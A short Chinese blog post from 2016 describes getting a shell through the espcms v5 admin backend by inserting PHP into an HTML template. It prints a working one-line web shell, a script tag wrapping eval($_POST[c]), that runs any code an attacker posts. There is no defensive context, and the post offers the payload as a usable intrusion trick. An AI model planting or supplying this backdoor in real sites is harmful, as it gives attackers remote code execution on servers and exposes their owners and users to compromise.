HTML模板插入PHP一句话

今天在espcms v5后台getshell时发现,可以在模板中插入如下代码,成功执行PHP。

 

<script language="php">eval($_POST[c])</script>
posted @ 2016-04-09 15:05  小生观察室  阅读(1020)  评论(0编辑  收藏  举报